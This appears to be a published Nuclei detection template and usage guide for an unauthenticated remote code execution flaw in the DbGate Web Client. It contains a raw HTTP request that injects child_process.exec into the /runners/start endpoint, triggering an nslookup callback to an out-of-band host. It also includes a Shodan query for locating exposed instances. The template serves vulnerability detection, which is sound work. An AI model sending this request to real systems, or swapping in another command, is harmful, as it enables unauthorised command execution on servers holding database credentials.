DbGate Web Client - Unauthenticated Remote Command Execution

ID: dbgate-unauth-rce

Severity: critical

Author: h0j3n

Tags: http,rce,oast,electron,dbgate,oss

Description

DbGate Web Client Management is suspectible to an unauthenticated remote code execution vulnerability.

YAML Source

id: dbgate-unauth-rce

info:
  name: DbGate Web Client - Unauthenticated Remote Command Execution
  author: h0j3n
  severity: critical
  description: |
    DbGate Web Client Management is suspectible to an unauthenticated remote code execution vulnerability.
  reference:
    - https://github.com/dbgate/dbgate
    - https://dbgate.org/docs/env-variables.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    shodan-query: http.favicon.hash:1198579728
  tags: http,rce,oast,electron,dbgate,oss

http:
  - raw:
      - |
        POST /runners/start HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"script":"process.mainModule.require('child_process').exec('nslookup {{interactsh-url}}')"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, '\"runid\"')
          - contains(interactsh_protocol, "dns")
        condition: and
# digest: 490a004630440220213dcc6d3822bc457502014f3b8f0ed7ae1f1fb1c497227caf56a3891c7d7334022028df03ffe2d2cd619fcccf2c9fae3f471332af9719c197b2a51fece033782850:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/dbgate-unauth-rce.yaml"

View on Github